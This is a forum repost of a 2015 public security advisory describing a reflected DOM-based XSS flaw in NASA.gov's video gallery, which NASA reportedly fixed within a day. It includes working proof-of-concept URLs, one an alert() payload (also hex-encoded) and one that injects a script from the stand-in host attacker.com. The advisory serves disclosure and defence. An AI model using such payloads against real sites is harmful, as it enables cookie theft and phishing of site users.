Aerosol Posted April 1, 2015 Report Posted April 1, 2015 ####################################################################### Exploit Title: NASA.gov main-domain DOM-XSS# Date: 01/04/2015# Author: Yann CAM - Georges TAUPIN @ Synetis - ASafety# Vendor or Software Link: www.nasa.gov# Version: /# Category: DOM-XSS# Google dork:# Tested on: NASA.gov main-domain######################################################################NASA description :=======================================================================================The National Aeronautics and Space Administration (NASA) is the United States government agency responsible for the civilian space program as well as aeronautics and aerospace research.There are several sub-domains and independent projects within NASA.Those affected by this advisory are :- NASA’s video gallery on main domain : DOM Cross-Site Scripting (RXSS)Vulnerability description :=======================================================================================Reflected DOM XSS are available in nasa.gov main-domain above.Through this kind of vulnerability, an attacker could tamper with page rendering, redirect victims to fake NASA portals, or capture NASA's users credentials such cookies. These reflected XSS are on GET variables and are not properly sanitized before being used in page.NASA’s main portal - video gallery - PoC :=======================================================================================- Proof of Concept (PoC), canonical DOM-XSS "alert()", tested on Firefox 35, Chrome 39 and IE 11:http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3Dalert(/RXSS/) />or the same fully-url-encoded :http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%2f%52%58%53%53%2f%29%20%2f%3eThe previous link generates a JavaScript "alert()" box in the browser context.- Proof of Concept (PoC), canonical DOM-XSS "loading third party JS script", tested on Firefox 35, Chrome 39 and IE 11:http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3D"var s%3Ddocument.createElement('script');s.setAttribute('src','http://attacker.com/x.js');document.getElementsByTagName('head').item(0).appendChild(s);" />Screenshots :=======================================================================================- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_001.png- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_003.png- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_004.pngSolution:=======================================================================================Fixed by NASA Portal's team.Additional resources :=======================================================================================- http://www.nasa.gov/- https://www.owasp.org/index.php/DOM_Based_XSS- http://www.asafety.fr/vuln-exploit-poc/contribution-nasa-gov-portail-principal-dom-xss- http://www.synetis.comReport timeline :=======================================================================================2015-01-25 : NASA Portal's team was alerted by email through "contact form".2015-01-26 : NASA Portal's team fixed the vulnerability2015-04-01 : Public advisoryCredits :======================================================================================= 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 www.synetis.com 8888 Consulting firm in management and information securityYann CAM - Georges TAUPIN - Security Consultants @ Synetis | ASafety--SYNETIS | ASafetyCONTACT: www.synetis.com | www.asafety.fr | www.georgestaupin.comSource Quote
